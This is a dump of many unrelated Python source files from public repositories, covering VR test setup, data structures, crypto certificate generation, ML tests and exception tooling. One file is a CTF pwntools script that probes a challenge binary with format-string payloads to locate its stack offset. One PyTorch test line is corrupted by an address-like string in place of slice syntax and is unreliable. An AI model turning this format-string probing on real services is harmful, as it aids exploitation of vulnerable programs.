# Seems like we should be able to use SharedPageState's default platform
# property instead of specifying AndroidPlatform, and then just perform
# different setup based off the platform type
device = android_device.GetDevice(finder_options)
assert device, 'Android device is required for this story'
self._platform = platform.GetPlatformForDevice(device, finder_options)
assert self._platform, 'Unable to create Android platform'
assert isinstance(self._platform, android_platform.AndroidPlatform)
super(SharedAndroidVrPageState, self).__init__(test, finder_options,
story_set)
self._story_set = story_set
# Optimization so we're not doing redundant service starts before every
# story.
self._did_set_tracker = False
self._PerformAndroidVrSetup()
def _PerformAndroidVrSetup(self):
self._InstallVrCore()
self._ConfigureVrCore(os.path.join(path_util.GetChromiumSrcDir(),
self._finder_options.shared_prefs_file))
self._InstallNfcApk()
self._InstallKeyboardApk()
def _InstallVrCore(self):
"""Installs the VrCore APK."""
# TODO(bsheedy): Add support for temporarily replacing it if it's still
# installed as a system app on the test device
self._platform.InstallApplication(
os.path.join(path_util.GetChromiumSrcDir(), 'third_party',
'gvr-android-sdk', 'test-apks', 'vr_services',
'vr_services_current.apk'))
def _ConfigureVrCore(self, filepath):
"""Configures VrCore using the provided settings file."""
settings = shared_preference_utils.ExtractSettingsFromJson(filepath)
for setting in settings:
shared_pref = self._platform.GetSharedPrefs(
setting['package'], setting['filename'],
use_encrypted_path=setting.get('supports_encrypted_path', False))
shared_preference_utils.ApplySharedPreferenceSetting(
shared_pref, setting)
def _InstallNfcApk(self):
"""Installs the APK that allows VR tests to simulate a headset NFC scan."""
chromium_root = path_util.GetChromiumSrcDir()
# Find the most recently build APK
candidate_apks = []
for build_path in util.GetBuildDirectories(chromium_root):
apk_path = os.path.join(build_path, 'apks', 'VrNfcSimulator.apk')
if os.path.exists(apk_path):
last_changed = os.path.getmtime(apk_path)
candidate_apks.append((last_changed, apk_path))
if not candidate_apks:
raise RuntimeError(
'Could not find VrNfcSimulator.apk in a build output directory')
newest_apk_path = sorted(candidate_apks)[-1][1]
self._platform.InstallApplication(
os.path.join(chromium_root, newest_apk_path))
def _InstallKeyboardApk(self):
"""Installs the VR Keyboard APK."""
self._platform.InstallApplication(
os.path.join(path_util.GetChromiumSrcDir(), 'third_party',
'gvr-android-sdk', 'test-apks', 'vr_keyboard',
'vr_keyboard_current.apk'))
def _SetFakePoseTrackerIfNotSet(self):
if self._story_set.use_fake_pose_tracker and not self._did_set_tracker:
self.SetPoseTrackerType('fake')
self.SetPoseTrackerMode('sweep')
self._did_set_tracker = True
def SetPoseTrackerType(self, tracker_type):
"""Sets the VrCore pose tracker to the given type.
Only works if VrCore has been configured to use the VrCore-side tracker
by setting EnableVrCoreHeadTracking to true. This setting persists between
VR sessions and Chrome restarts.
Args:
tracker_type: A string corresponding to the tracker type to set.
Raises:
RuntimeError if the given |tracker_type| is not in the supported list.
"""
if tracker_type not in SUPPORTED_POSE_TRACKER_TYPES:
raise RuntimeError('Given tracker %s is not supported.' % tracker_type)
self.platform.StartAndroidService(start_intent=intent.Intent(
action='com.google.vr.vrcore.SET_TRACKER_TYPE',
component=FAKE_TRACKER_COMPONENT,
extras={'com.google.vr.vrcore.TRACKER_TYPE': tracker_type}))
def SetPoseTrackerMode(self, tracker_mode):
"""Sets the fake VrCore pose tracker to provide poses in the given mode.
Only works after SetPoseTrackerType has been set to 'fake'. This setting
persists between VR sessions and Chrome restarts.
Args:
tracker_mode: A string corresponding to the tracker mode to set.
Raises:
RuntimeError if the given |tracker_mode| is not in the supported list.
"""
if tracker_mode not in SUPPORTED_POSE_TRACKER_MODES:
raise RuntimeError('Given mode %s is not supported.' % tracker_mode)
self.platform.StartAndroidService(start_intent=intent.Intent(
action='com.google.vr.vrcore.SET_FAKE_TRACKER_MODE',
component=FAKE_TRACKER_COMPONENT,
extras={'com.google.vr.vrcore.FAKE_TRACKER_MODE': tracker_mode}))
def WillRunStory(self, page):
super(SharedAndroidVrPageState, self).WillRunStory(page)
if not self._finder_options.disable_screen_reset:
self._CycleScreen()
self._SetFakePoseTrackerIfNotSet()
def TearDownState(self):
super(SharedAndroidVrPageState, self).TearDownState()
# Reset the tracker type to use the actual sensor if it's been changed. When
# run on the bots, this shouldn't matter since the service will be killed
# during the automatic restart, but this could persist when run locally.
if self._did_set_tracker:
self.SetPoseTrackerType('sensor')
# Re-apply Cardboard as the viewer to leave the device in a consistent
# state after a benchmark run
# TODO(bsheedy): Remove this after crbug.com/772969 is fixed
self._ConfigureVrCore(os.path.join(path_util.GetChromiumSrcDir(),
CARDBOARD_PATH))
def _CycleScreen(self):
"""Cycles the screen off then on.
This is because VR test devices are set to have normal screen brightness and
automatically turn off after several minutes instead of the usual approach
of having the screen always on at minimum brightness. This is due to the
motion-to-photon latency test being sensitive to screen brightness, and min
brightness does not work well for it.
Simply using TurnScreenOn does not actually reset the timer for turning off
the screen, so instead cycle the screen to refresh it periodically.
"""
self.platform.android_action_runner.TurnScreenOff()
self.platform.android_action_runner.TurnScreenOn()
@property
def platform(self):
return self._platform
@property
def recording_wpr(self):
return self._finder_options.recording_wpr
|
recipes/Python/87369_Priority_Queue/recipe-87369.py
|
tdiprima/code
| 2,023 |
117997
|
<gh_stars>1000+
import Queue
class PriorityQueue(Queue.Queue):
def _put(self, item):
data, priority = item
self._insort_right((priority, data))
def _get(self):
return self.queue.pop(0)[1]
def _insort_right(self, x):
"""Insert item x in list, and keep it sorted assuming a is sorted.
If x is already in list, insert it to the right of the rightmost x.
"""
a = self.queue
lo = 0
hi = len(a)
while lo < hi:
mid = (lo+hi)/2
if x[0] < a[mid][0]: hi = mid
else: lo = mid+1
a.insert(lo, x)
def test():
pq = PriorityQueue()
pq.put(('b', 1))
pq.put(('a', 1))
pq.put(('c', 1))
pq.put(('z', 0))
pq.put(('d', 2))
while not pq.empty():
print pq.get(),
test() # prints z b a c d
|
client/verta/verta/_swagger/_public/uac/model/UacAction.py
|
CaptEmulation/modeldb
| 835 |
118087
|
# THIS FILE IS AUTO-GENERATED. DO NOT EDIT
from verta._swagger.base_type import BaseType
class UacAction(BaseType):
def __init__(self, service=None, role_service_action=None, authz_service_action=None, modeldb_service_action=None):
required = {
"service": False,
"role_service_action": False,
"authz_service_action": False,
"modeldb_service_action": False,
}
self.service = service
self.role_service_action = role_service_action
self.authz_service_action = authz_service_action
self.modeldb_service_action = modeldb_service_action
for k, v in required.items():
if self[k] is None and v:
raise ValueError('attribute {} is required'.format(k))
@staticmethod
def from_json(d):
from .ServiceEnumService import ServiceEnumService
from .RoleActionEnumRoleServiceActions import RoleActionEnumRoleServiceActions
from .AuthzActionEnumAuthzServiceActions import AuthzActionEnumAuthzServiceActions
from .ModelDBActionEnumModelDBServiceActions import ModelDBActionEnumModelDBServiceActions
tmp = d.get('service', None)
if tmp is not None:
d['service'] = ServiceEnumService.from_json(tmp)
tmp = d.get('role_service_action', None)
if tmp is not None:
d['role_service_action'] = RoleActionEnumRoleServiceActions.from_json(tmp)
tmp = d.get('authz_service_action', None)
if tmp is not None:
d['authz_service_action'] = AuthzActionEnumAuthzServiceActions.from_json(tmp)
tmp = d.get('modeldb_service_action', None)
if tmp is not None:
d['modeldb_service_action'] = ModelDBActionEnumModelDBServiceActions.from_json(tmp)
return UacAction(**d)
|
chrome/common/extensions/docs/server2/future.py
|
kjthegod/chromium
| 2,151 |
118089
|
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import logging
import sys
import traceback
_no_value = object()
def _DefaultErrorHandler(error):
raise error
def All(futures, except_pass=None, except_pass_log=False):
'''Creates a Future which returns a list of results from each Future in
|futures|.
If any Future raises an error other than those in |except_pass| the returned
Future will raise as well.
If any Future raises an error in |except_pass| then None will be inserted as
its result. If |except_pass_log| is True then the exception will be logged.
'''
def resolve():
resolved = []
for f in futures:
try:
resolved.append(f.Get())
# "except None" will simply not catch any errors.
except except_pass:
if except_pass_log:
logging.error(traceback.format_exc())
resolved.append(None)
pass
return resolved
return Future(callback=resolve)
def Race(futures, except_pass=None, default=_no_value):
'''Returns a Future which resolves to the first Future in |futures| that
either succeeds or throws an error apart from those in |except_pass|.
If all Futures throw errors in |except_pass| then |default| is returned,
if specified. If |default| is not specified then one of the passed errors
will be re-thrown, for a nice stack trace.
'''
def resolve():
first_future = None
for future in futures:
if first_future is None:
first_future = future
try:
return future.Get()
# "except None" will simply not catch any errors.
except except_pass:
pass
if default is not _no_value:
return default
# Everything failed and there is no default value, propagate the first
# error even though it was caught by |except_pass|.
return first_future.Get()
return Future(callback=resolve)
class Future(object):
'''Stores a value, error, or callback to be used later.
'''
def __init__(self, value=_no_value, callback=None, exc_info=None):
self._value = value
self._callback = callback
self._exc_info = exc_info
if (self._value is _no_value and
self._callback is None and
self._exc_info is None):
raise ValueError('Must have either a value, error, or callback.')
def Then(self, callback, error_handler=_DefaultErrorHandler):
'''Creates and returns a future that runs |callback| on the value of this
future, or runs optional |error_handler| if resolving this future results in
an exception.
If |callback| returns a non-Future value then the returned Future will
resolve to that value.
If |callback| returns a Future then it gets chained to the current Future.
This means that the returned Future will resolve to *that* Future's value.
This behaviour is transitive.
For example,
def fortytwo():
return Future(value=42)
def inc(x):
return x + 1
def inc_future(x):
return Future(value=x + 1)
fortytwo().Then(inc).Get() ==> 43
fortytwo().Then(inc_future).Get() ==> 43
fortytwo().Then(inc_future).Then(inc_future).Get() ==> 44
'''
def then():
val = None
try:
val = self.Get()
except Exception as e:
val = error_handler(e)
else:
val = callback(val)
return val.Get() if isinstance(val, Future) else val
return Future(callback=then)
def Get(self):
'''Gets the stored value, error, or callback contents.
'''
if self._value is not _no_value:
return self._value
if self._exc_info is not None:
self._Raise()
try:
self._value = self._callback()
return self._value
except:
self._exc_info = sys.exc_info()
self._Raise()
def _Raise(self):
exc_info = self._exc_info
raise exc_info[0], exc_info[1], exc_info[2]
|
hsctf7/got_it/base.py
|
nhtri2003gmail/ctf-write-ups
| 101 |
118104
|
#!/usr/bin/python3
from pwn import *
def scanit(t):
p = process('./got_it')
#p = remote('pwn.hsctf.com', 5004)
p.recvuntil('Give me sumpfink to help me out!\n')
p.sendline(t)
_ = p.recvuntil('worked').split()[-2].split(b'"')[1]
p.close()
return _
for i in range(1,20):
t = '%' + str(i).rjust(2,'0') + '$018p'
_ = scanit(t)
print(i,_)
if _.find(b'0x') >= 0:
s = bytes.fromhex(_[2:].decode())[::-1]
if s == t.encode():
print('base:',i)
break
|
Dragon/python/dragon/tools/summary_writer.py
|
neopenx/Dragon
| 212 |
118113
|
<gh_stars>100-1000
# --------------------------------------------------------
# Dragon
# Copyright(c) 2017 SeetaTech
# Written by <NAME>
# --------------------------------------------------------
from dragon.core.tensor import Tensor
import dragon.core.workspace as ws
import os
class ScalarSummary(object):
"""Write scalar summary.
Examples
--------
>>> sw = ScalarSummary(log_dir='logs')
>>> sw.add_summary(('loss', 2.333), 0)
"""
def __init__(self, log_dir='logs'):
"""Construct a ScalarSummary writer.
Parameters
----------
log_dir : str
The root folder of logs.
Returns
-------
ScalarSummary
The scalar writer.
"""
self.log_dir = os.path.join(log_dir, 'scalar')
if not os.path.exists(self.log_dir): os.makedirs(self.log_dir)
def add_summary(self, scalar, global_step):
"""Add a summary.
Parameters
----------
scalar : tuple or Tensor
The scalar.
global_step : int
The time step of this summary.
Returns
-------
None
"""
if isinstance(scalar, Tensor):
key, value = scalar.name, ws.FetchTensor(scalar)[0]
elif isinstance(scalar, tuple): key, value = scalar
else: raise TypeError()
key = key.replace('/', '_')
with open(os.path.join(self.log_dir, key + '.txt'), 'a') as f:
f.write(str(global_step) + ' ' + str(value) + '\n')
|
thingsboard_gateway/connectors/rest/ssl_generator.py
|
ferguscan/thingsboard-gateway
| 1,123 |
118117
|
import datetime
from thingsboard_gateway.tb_utility.tb_utility import TBUtility
try:
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
except ImportError:
print("Requests library not found - installing...")
TBUtility.install_package("cryptography")
from cryptography.hazmat.backends import default_backend
from cryptography.hazmat.primitives import serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography import x509
from cryptography.x509.oid import NameOID
from cryptography.hazmat.primitives import hashes
class SSLGenerator:
def __init__(self, hostname):
self.hostname: str = hostname
def generate_certificate(self):
key = rsa.generate_private_key(
public_exponent=65537,
key_size=2048,
backend=default_backend(),
)
with open("domain_srv.key", "wb") as f:
f.write(key.private_bytes(
encoding=serialization.Encoding.PEM,
format=serialization.PrivateFormat.TraditionalOpenSSL,
encryption_algorithm=serialization.NoEncryption(),
))
subject = issuer = x509.Name([
x509.NameAttribute(NameOID.COUNTRY_NAME, u"US"),
x509.NameAttribute(NameOID.STATE_OR_PROVINCE_NAME, u"CA"),
x509.NameAttribute(NameOID.LOCALITY_NAME, u"locality"),
x509.NameAttribute(NameOID.ORGANIZATION_NAME, u"A place"),
x509.NameAttribute(NameOID.COMMON_NAME, self.hostname),
])
cert = x509.CertificateBuilder().subject_name(
subject
).issuer_name(
issuer
).public_key(
key.public_key()
).serial_number(
x509.random_serial_number()
).not_valid_before(
datetime.datetime.utcnow()
).not_valid_after(
datetime.datetime.utcnow() + datetime.timedelta(days=365)
).add_extension(
x509.SubjectAlternativeName([
x509.DNSName(u"localhost"),
x509.DNSName(self.hostname),
x509.DNSName(u"127.0.0.1")]),
critical=False,
).sign(key, hashes.SHA256(), default_backend())
with open("domain_srv.crt", "wb") as f:
f.write(cert.public_bytes(serialization.Encoding.PEM))
|
users/token_api.py
|
Jordzman/explorer
| 917 |
118156
|
import requests
import json
from tokens.settings import BLOCKCYPHER_API_KEY
def register_new_token(email, new_token, first=None, last=None):
assert new_token and email
post_params = {
"first": "MichaelFlaxman",
"last": "TestingOkToToss",
"email": "<EMAIL>",
"token": new_token,
}
url = 'https://api.blockcypher.com/v1/tokens'
get_params = {'token': BLOCKCYPHER_API_KEY}
r = requests.post(url, data=json.dumps(post_params), params=get_params,
verify=True, timeout=20)
assert 'error' not in json.loads(r.text)
return new_token
|
tests/torch/_C/csrc/test_fused_layer_norm_rms.py
|
lipovsek/oslo
| 249 |
118158
|
# from oslo.torch._C import FusedLayerNormBinder
import torch
import unittest
import itertools
import oslo.torch.nn as onn
class TestFusedRMSNorm(unittest.TestCase):
dtype = torch.float
elementwise_affine = False
normalized_shape = [32, 16]
rtol, atol = None, None
fwd_thresholds = dict(rtol=None, atol=None)
bwd_thresholds = dict(rtol=None, atol=None)
mixed_fused = False
def setUp(self):
# bias and weight are set to 0 and 1 respectively, so no need to copy parameters from cpu module to the gpu one
if not self.mixed_fused:
self.module_cpu_ = onn.FusedRMSNorm(
normalized_shape=self.normalized_shape,
elementwise_affine=self.elementwise_affine,
).cpu()
self.module_cuda_ = onn.FusedRMSNorm(
normalized_shape=self.normalized_shape,
elementwise_affine=self.elementwise_affine,
).to(device="cuda", dtype=self.dtype)
else:
assert self.elementwise_affine
self.module_cpu_ = onn.MixedFusedRMSNorm(
normalized_shape=self.normalized_shape
).cpu()
self.module_cuda_ = onn.MixedFusedRMSNorm(
normalized_shape=self.normalized_shape
).to(device="cuda", dtype=self.dtype)
def _check_same_output(self, batch_size, contiguous):
torch.cuda.manual_seed(42)
if contiguous:
input_shape = [batch_size] + self.normalized_shape
input_ = torch.randn(input_shape, device="cpu").requires_grad_(True)
input_cuda_ = (
input_.to(device="cuda", dtype=self.dtype).detach().requires_grad_(True)
)
self.assertTrue(input_.is_contiguous())
self.assertTrue(input_cuda_.is_contiguous())
else:
input_shape = [batch_size] + self.normalized_shape
input_shape = [batch_size * 3] + [
self.normalized_shape[0] * 5,
self.normalized_shape[1] * 3,
]
input_src_ = torch.randn(input_shape, device="cpu")
input_ = input_src_[::3, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::3].detach().requires_grad_(True)
input_cuda_ = (
input_src_.to(device="cuda", dtype=self.dtype)[::3, fd00:c2b6:b24b:be67:2827:688d:e6a1:6a3b, ::3]
.detach()
.requires_grad_(True)
)
# make sure that tensors are NOT contiguous.
self.assertFalse(input_.is_contiguous())
self.assertFalse(input_cuda_.is_contiguous())
out_cpu_ = self.module_cpu_(input_)
gO = torch.rand_like(out_cpu_)
out_cpu_.backward(gO)
out_cuda_ = self.module_cuda_(input_cuda_)
# TODO (mkozuki): `torch.testing.assert_allclose` is deprecated.
# Use `torch.testing.assert_close`.
# See https://github.com/pytorch/pytorch/issues/61844
torch.testing.assert_allclose(
out_cpu_.to(device="cuda", dtype=self.dtype),
out_cuda_.clone().detach(),
**self.fwd_thresholds,
)
gO = gO.to(device="cuda", dtype=self.dtype)
out_cuda_.backward(gO)
self.assertFalse(out_cpu_.is_cuda)
self.assertTrue(out_cuda_.is_cuda)
torch.testing.assert_allclose(
input_.grad.to(device="cuda", dtype=self.dtype),
input_cuda_.grad,
**self.bwd_thresholds,
)
if self.elementwise_affine:
torch.testing.assert_allclose(
self.module_cpu_.weight.grad.to(device="cuda", dtype=self.dtype),
self.module_cuda_.weight.grad,
**self.bwd_thresholds,
)
def _test_same_output(self, batch_size):
for contiguous in (True, False):
with self.subTest(contiguous=contiguous):
self._check_same_output(batch_size, contiguous)
def test_layer_norm(self):
self._test_same_output(16)
def test_large_batch(self):
self._test_same_output(65536)
class TestFusedRMSNormElemWise(TestFusedRMSNorm):
bwd_thresholds = dict(rtol=2e-3, atol=2e-4)
elementwise_affine = True
class TestMixedFusedRMSNormElemWise(TestFusedRMSNorm):
bwd_thresholds = dict(rtol=2e-3, atol=2e-4)
elementwise_affine = True
mixed_fused = True
class TestFusedRMSNormElemWiseHalf(TestFusedRMSNormElemWise):
dtype = torch.half
bwd_thresholds = dict(rtol=1.6e-2, atol=3e-3)
def test_large_batch(self):
self.skipTest("Skip to save time")
if __name__ == "__main__":
unittest.main(verbosity=True)
|
packages/core/minos-microservice-saga/minos/saga/executions/repositories/database/impl.py
|
minos-framework/minos-python
| 247 |
118166
|
<gh_stars>100-1000
from __future__ import (
annotations,
)
from typing import (
Optional,
)
from uuid import (
UUID,
)
from minos.common import (
DatabaseMixin,
ProgrammingException,
)
from ....exceptions import (
SagaExecutionNotFoundException,
)
from ...saga import (
SagaExecution,
)
from ..abc import (
SagaExecutionRepository,
)
from .factories import (
SagaExecutionDatabaseOperationFactory,
)
class DatabaseSagaExecutionRepository(SagaExecutionRepository, DatabaseMixin[SagaExecutionDatabaseOperationFactory]):
"""Saga Execution Storage class."""
def __init__(self, *args, database_key: Optional[tuple[str]] = None, **kwargs):
if database_key is None:
database_key = ("saga",)
super().__init__(*args, database_key=database_key, **kwargs)
async def _store(self, execution: SagaExecution) -> None:
operation = self.database_operation_factory.build_store(**execution.raw)
await self.execute_on_database(operation)
async def _delete(self, uuid: UUID) -> None:
operation = self.database_operation_factory.build_delete(uuid)
await self.execute_on_database(operation)
async def _load(self, uuid: UUID) -> SagaExecution:
operation = self.database_operation_factory.build_load(uuid)
try:
value = await self.execute_on_database_and_fetch_one(operation)
except ProgrammingException:
raise SagaExecutionNotFoundException(f"The execution identified by {uuid} was not found.")
execution = SagaExecution.from_raw(value)
return execution
|
scripts/listen_input.py
|
Dobbie03/orw
| 204 |
118175
|
#!/usr/bin/env python
from pynput.keyboard import Key, Listener
def on_press(key):
if key == Key.enter:
return False
with Listener(on_press=on_press) as listener:
listener.join()
|
2021/day_11.py
|
salt-die/Advent-of-Code
| 105 |
118229
|
<reponame>salt-die/Advent-of-Code
from itertools import count
import numpy as np
from scipy.ndimage import convolve
import aoc_helper
OCTOPI = aoc_helper.utils.int_grid(aoc_helper.day(11))
KERNEL = np.ones((3, 3), dtype=int)
def step(octos):
octos += 1
flashed = np.zeros_like(octos, dtype=bool)
while (flashing := ((octos > 9) & ~flashed)).any():
octos += convolve(flashing.astype(int), KERNEL, mode="constant")
flashed |= flashing
octos[flashed] = 0
return flashed.sum()
def part_one():
octos = OCTOPI.copy()
return sum(step(octos) for _ in range(100))
def part_two():
octos = OCTOPI.copy()
for i in count():
if (octos == 0).all():
return i
step(octos)
aoc_helper.submit(11, part_one)
aoc_helper.submit(11, part_two)
|
tools/ops/test_policylambda.py
|
al3pht/cloud-custodian
| 2,415 |
118231
|
<reponame>al3pht/cloud-custodian
# Copyright The Cloud Custodian Authors.
# SPDX-License-Identifier: Apache-2.0
import jmespath
from c7n.config import Config
from c7n.loader import PolicyLoader
from policylambda import dispatch_render
def test_config_rule_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'type': 'config-rule'}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert set(sam['Resources']) == set((
'CheckEc2', 'CheckEc2ConfigRule', 'CheckEc2InvokePermission'))
assert jmespath.search(
'Resources.CheckEc2ConfigRule.Properties.Source.SourceIdentifier',
sam) == {'Fn::GetAtt': 'CheckEc2' + '.Arn'}
def test_cloudtrail_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'type': 'cloudtrail',
'events': ['RunInstances']}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert sam['Resources']['CheckEc2']['Properties']['Events'] == {
'PolicyTriggerA': {
'Properties': {
'Pattern': {
'detail': {
'eventName': ['RunInstances'],
'eventSource': ['ec2.amazonaws.com']},
'detail-type': [
'AWS API Call via CloudTrail']}},
'Type': 'CloudWatchEvent'}
}
def test_periodic_policy():
collection = PolicyLoader(Config.empty()).load_data(
{'policies': [{
'name': 'check-ec2',
'resource': 'ec2',
'mode': {
'schedule': 'rate(1 hour)',
'type': 'periodic'}}]},
file_uri=":mem:")
sam = {'Resources': {}}
p = list(collection).pop()
dispatch_render(p, sam)
assert sam['Resources']['CheckEc2']['Properties']['Events'] == {
'PolicySchedule': {
'Type': 'Schedule',
'Properties': {
'Schedule': 'rate(1 hour)'
}
}
}
|
pylama/libs/__init__.py
|
rzuckerm/pylama
| 463 |
118266
|
<reponame>rzuckerm/pylama
""" Support libs. """
|
instances/migrations/0002_permissionset.py
|
NGXTDN/webvirtcloud
| 1,246 |
118288
|
# Generated by Django 2.2.12 on 2020-05-27 07:01
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('instances', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='PermissionSet',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
],
options={
'permissions': (('clone_instances', 'Can clone instances'),),
'managed': False,
'default_permissions': (),
},
),
]
|
LeetCode/python3/213.py
|
ZintrulCre/LeetCode_Archiver
| 279 |
118292
|
class Solution:
def Rob(self, nums, m, n) -> int:
prev, curr = nums[m], max(nums[m], nums[m + 1])
for i in range(m + 2, n):
prev, curr = curr, max(prev + nums[i], curr)
return curr
def rob(self, nums: List[int]) -> int:
if len(nums) == 0:
return 0
elif len(nums) <= 2:
return max(nums)
return max(self.Rob(nums, 0, len(nums) - 1), self.Rob(nums, 1, len(nums)))
|
exceptions/intro_objects.py
|
hugmyndakassi/hvmi
| 677 |
118300
|
#
# Copyright (c) 2020 Bitdefender
# SPDX-License-Identifier: Apache-2.0
#
import struct
import re
from abc import ABCMeta, abstractmethod
import excfg
import crc32
# Note: We cannot use os.path here since it's os specific and we must be able to run
# this both on windows & linux
DEFAULT_FLAGS = {
"SignatureFlags": "32 64",
"UserExceptionFlags": "32 64",
"KernelExceptionFlags": "32 64",
"HeaderMagic": 0x414E5845, # 'EXNA'
}
IMAGE_BASE_NAME_LEN = 14
LIX_COMM_LEN = 15
SIG_IDS = dict()
def is_path(name):
""" Returns True if the given name is a path. Does not validate if the path
is correct except basic invalid characters. """
if name is None or len(name) < 3:
return False
# if ('"' in name) or ('<' in name) or ('>' in name) or \
# ('|' in name) or ('*' in name):
# return False
if name.startswith("\\") or name.startswith("/"):
# \sysroot\etc\a.exe, /home/user/a.out, \??\C:\Program Files\a.exe, etc.
return True
if str.isalpha(name[0]) and name[1] == ":" and name[2] == "\\":
# C:\Program Files, D:\Program Files, etc.
return True
return False
def get_name_from_path(path):
""" Given a path, returns the name of the file (the last part in the path).
The path must not end with a separator ('\\' on windows, '/' on linux).
Returns a string containing the name. """
if not is_path(path):
return path
last = path.rfind("\\")
if last == -1:
last = path.rfind("/")
if last == -1:
raise ValueError("Path %s is not containing any name!" % path)
if last == len(path) - 1:
raise ValueError("Path %s ends with separator!" % path)
return path[last + 1 :]
def unsigned(val):
return int(val & 0xFFFFFFFF)
def cmp_unsigned(val1, val2):
""" Compares 'val1' and 'val2' as unsigned numbers. Respects the
unix 'cmp' function return values (-1, 0, 1). """
val1 = unsigned(val1)
val2 = unsigned(val2)
if val1 > val2:
return 1
if val1 < val2:
return -1
return 0
def cmp_string(val1, val2):
""" Compares 'val1' and 'val2' as unsigned numbers. Respects the
unix 'cmp' function return values (-1, 0, 1). """
if val1 > val2:
return 1
if val1 < val2:
return -1
return 0
def get_binary_name(name, cls, wide=True, trim=0):
""" Returns the binary hash of the given name. This function also checks
the predefined names in the config file based on the `cls` argument.
If `wide` is True, then it will convert the name to the wide (utf-16)
format.
If trim is != 0, then it will trim the name to `trim` chars. """
if not name:
return int(-1)
if cls is KernelException:
predefined = excfg.get("Predefined", "kernel-mode")
elif cls is UserException:
predefined = excfg.get("Predefined", "user-mode")
elif cls is KernelUserException:
predefined = excfg.get("Predefined", "kenrel-user-mode")
elif cls is Signature:
predefined = excfg.get("Predefined", "signature")
else:
raise ValueError("Invalid class %s" % cls)
if name in predefined:
return predefined[name]
if trim:
return crc32.crc32(name[:trim], wide=wide)
return crc32.crc32(name, wide=wide)
def get_binary_flags(flags, cls):
""" Returns the binary representation of the given flags.
If the `cls` is a UserException then it will use the values from 'user-mode'
config flags and the 'common' ones.
If the `cls` is a KernelException then it will use the values from
'kernel-mode' config flags and the 'common' ones.
If the `cls` is a UserException then it will use the values from
'signatures' config flags. The 'common' ones are ignored. """
cfg_cflags = excfg.get("Flags", "common")
if cls is KernelException:
cfg_flags = excfg.get("Flags", "kernel-mode")
elif cls is UserException or cls is UserGlobException:
cfg_flags = excfg.get("Flags", "user-mode")
elif cls is KernelUserException:
cfg_flags = excfg.get("Flags", "user-mode")
cfg_flags.update(excfg.get("Flags", "kernel-mode"))
cfg_flags.update(excfg.get("Flags", "kernel-user-mode"))
elif cls is Signature:
cfg_flags = excfg.get("Flags", "signatures")
cfg_cflags = []
else:
raise ValueError("Invalid class %s" % cls)
bin_flags = 0
for flag in flags.split(" "):
if flag in cfg_flags:
bin_flags = bin_flags | cfg_flags[flag]
elif flag in cfg_cflags:
bin_flags = bin_flags | cfg_cflags[flag]
else:
raise ValueError("Invalid flag " + flag)
return bin_flags
def get_sig_id(sig_id, sig_type, create_new=True):
""" If we don't have this signature in the hash_map, then add it this way;
if we request the id of a signature at different times and from different
functions, we will get either a new one, or the old one. """
if sig_type == 0 and sig_id not in SIG_IDS:
raise ValueError("invalid signature type")
if sig_id not in SIG_IDS:
if not create_new:
raise ValueError("Signature %s not present!" % sig_id)
new_id = len(SIG_IDS) + 1
new_id += (sig_type << 22)
SIG_IDS[sig_id] = new_id
elif create_new:
raise ValueError("Duplicated signature found", sig_id)
return SIG_IDS[sig_id]
def get_binary_signatures(signatures):
""" Returns a sorted list containing the binary id of each signature. For
more details see `get_sig_id`. """
if not signatures:
return []
return sorted([get_sig_id(sig, 0, False) for sig in signatures])
class IntroObject(metaclass=ABCMeta):
""" Just an interface containing method for dumping objects in binary
or textual form. """
@abstractmethod
def get_binary_header(self):
""" Returns the binary header, dependent on the object type. """
raise NotImplementedError
@abstractmethod
def get_binary(self):
""" Returns the binary contents, dependent on the object type. """
raise NotImplementedError
def _cmp(self, other):
""" Will be replaced below, and each of '__lt__', etc. will call the
proper '_cmp' method. """
raise NotImplementedError
def __lt__(self, other):
return self._cmp(other) < 0
def __le__(self, other):
return self._cmp(other) <= 0
def __gt__(self, other):
return self._cmp(other) > 0
def __ge__(self, other):
return self._cmp(other) > 0
def __eq__(self, other):
return self._cmp(other) == 0
def __ne__(self, other):
return self._cmp(other) != 0
class IntroFileHeader(IntroObject):
""" Represent the header of the exceptions file. This is written only once,
at the begining. """
def __init__(self, km_count, um_count, kum_count, umgb_count, sig_count, build):
self.km_count = km_count
self.um_count = um_count
self.kum_count = kum_count
self.umgb_count = umgb_count
self.sig_count = sig_count
self.build = build
def get_binary(self):
""" Returns a binary string containing the values from the tuple.
The format is as follows:
- HeaderMagic[32]
- VersionMajor[16]
- VersionMinor[16]
- KernelExceptionsCount[32]
- UserExceptionsCount[32]
- SignaturesCount[32]
- BuildNumber[32]
- UserGlobExceptionCount[32]
- Reserved1[2 * 32] """
return struct.pack(
"<IHHIIIIIII",
DEFAULT_FLAGS["HeaderMagic"],
excfg.get("Version", "Major"),
excfg.get("Version", "Minor"),
self.km_count,
self.um_count,
self.sig_count,
self.build,
self.umgb_count,
self.kum_count,
0,
)
def _cmp(self, other):
""" Not implemented in this class. """
return NotImplemented
def get_binary_header(self):
""" Not implemented in this class. """
return NotImplemented
class KernelException(IntroObject):
""" Represents a kernel-mode exception. For more details about it's
implementation see `get_binary`. """
def _validate_args(self):
""" Validates that the values are good. If they are missing, they will
be initialized with the default values.
Raises ValueError if anything is not valid. """
if not self.originator and self.object_type not in ("token-privs", "security-descriptor", "acl-edit", "sud-modification"):
raise ValueError("originator cannot be missing!")
if not self.object_type:
raise ValueError("object type cannot be missing!")
if not self.victim and self.object_type in (
"driver",
"driver imports",
"driver code",
"driver data",
"driver resources",
"drvobj",
"fastio",
"driver exports",
"token-privs",
"security-descriptor",
"acl-edit",
